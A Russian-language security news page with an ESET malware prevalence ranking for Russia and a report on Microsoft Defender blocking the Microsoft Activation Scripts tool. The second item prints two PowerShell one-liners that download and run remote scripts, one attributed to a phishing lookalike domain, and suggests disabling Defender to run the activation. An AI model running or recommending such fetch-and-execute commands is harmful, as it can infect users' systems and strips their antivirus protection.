Eset представила список наиболее распространенных вредоносных программ

Eset представила список наиболее распространенных вредоносных программ

Российскую десятку вредоносного ПО с показателем 8,77% в прошлом месяце возглавило семейство угроз HTML/ScrInject.B.Gen, которое с помощью Java-скриптов перенаправляет пользователя на опасные ресурсы, что позволяет киберпреступникам совершать атаки на компьютер. Однако влияние данной угрозы в России ослабевает - доля присутствия этого вредоносного ПО составила 8,77%, что меньше показателя декабря на 4,86%. Подобная киберугроза, семейство HTML/Iframe.B.Gen, расположилась на третьем месте российской десятки с долей проникновения в 2,36%.



По-прежнему популярной остается злонамеренная программа Win32/Spy.Ursnif.A, которая крадет персональную информацию и учетные записи с зараженного компьютера, а затем отправляет их на удаленный сервер мошенников. В январе процент проникновения Spy.Ursnif составил 2,83%, что позволило ей удержать второе место российского рейтинга. Также в регионе высок процент распространения вредоносной программы Win32/Qhost (1,91% от общего числа угроз), которая модифицирует файл hosts и перенаправляет пользователя на фишинговые ресурсы.

«Наличие в этом месяце большого числа срабатываний наших продуктов на различные вредоносные сценарии, которые перенаправляют пользователей на злонамеренные ресурсы, показывают высокий процент компрометации легальных ресурсов Рунета, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики ESET. - Несмотря на то, что семейство Win32/Carberp, разработанное для кражи финансовых средств через банковские системы, опустилось на восьмое место, оно по-прежнему остается наиболее распространенной киберугрозой, обнаруживаемой при перенаправлении пользователей с легальных веб-ресурсов.

Мировой рейтинг вредоносного ПО также возглавляет семейство HTML/ScrInject.B.Gen (4,98%). Далее следуют злонамеренные программы INF/Autorun (крадет конфиденциальную информацию) и HTML/Iframe.B.
Доля России от общего количества обнаруженного в мире вредоносного ПО в январе составила 12,36%. При этом зафиксирован высокий процент уникальных угроз, которые приходятся на регион – 32,80%, что выше показателя предыдущего месяца почти на 7%.

Статистика угроз получена с помощью интеллектуальной технологии ESET Live Grid – облачного сервиса, обеспечивающего автоматическую передачу новых образцов подозрительных или вредоносных программ экспертам вирусной лаборатории ESET для анализа и принятия оперативного решения.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru